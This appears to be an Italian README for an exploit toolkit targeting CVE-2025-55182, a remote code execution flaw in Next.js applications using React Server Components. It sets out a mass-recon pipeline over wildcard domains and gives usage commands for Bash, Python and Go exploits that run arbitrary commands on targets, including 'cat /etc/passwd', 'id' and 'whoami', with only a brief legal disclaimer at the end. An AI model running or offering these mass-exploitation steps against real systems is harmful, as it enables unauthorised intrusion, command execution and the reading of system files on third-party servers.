
Un toolkit completo per rilevare e sfruttare la CVE-2025-55182, una vulnerabilità critica di Remote Code Execution nelle applicazioni Next.js che utilizzano React Server Components.
Questo repository include uno scanner Bash unificato (modalità Singola e di Massa), implementazioni in Python/Go e un flusso di lavoro di ricognizione per bug bounty.

Per la caccia di massa su domini wildcard, usa questa pipeline per filtrare i target prima della scansione:
# 1. Enumera i sottodomini
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filtra gli host attivi
httpx -l subs.txt -o live.txt
# 3. Rilevamento pre-scansione con Nuclei (opzionale)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
Lo script scanner.sh supporta scansioni su singolo target e scansioni di massa da un elenco di file.
chmod +x scanner.sh
Ideale per verificare un target specifico con output verboso.
# Controllo di base (impostazione predefinita: "id")
./scanner.sh -d example.com
# Esegui un comando personalizzato
./scanner.sh -d https://target.com -c "cat /etc/passwd"
Scansiona in modo efficiente un elenco di URL e salva gli host vulnerabili in un file.
# Scansiona un elenco di URL
./scanner.sh -l live.txt -c "whoami"
# File di output personalizzato
./scanner.sh -l live.txt -o my_bounty.txt
Usala se riscontri problemi con l'escape dei caratteri speciali in Bash.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
Alte prestazioni, dipendenze minime.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
Questo strumento è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati. L'uso non autorizzato è strettamente illegale. Lo sviluppatore non si assume alcuna responsabilità per usi impropri o danni causati da questo programma.
Dettaglio CVE NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Advisory di Sicurezza React (vulnerabilità di React Server Components): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Modello Nuclei di ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Flag | Descrizione |
|---|
-d, --domain | URL del singolo target |
-l, --list | File contenente l'elenco di URL |
-c, --command | Comando da eseguire (predefinito: id) |
-o, --output | File di output per gli host vulnerabili (predefinito: vulnerable_hosts.txt) |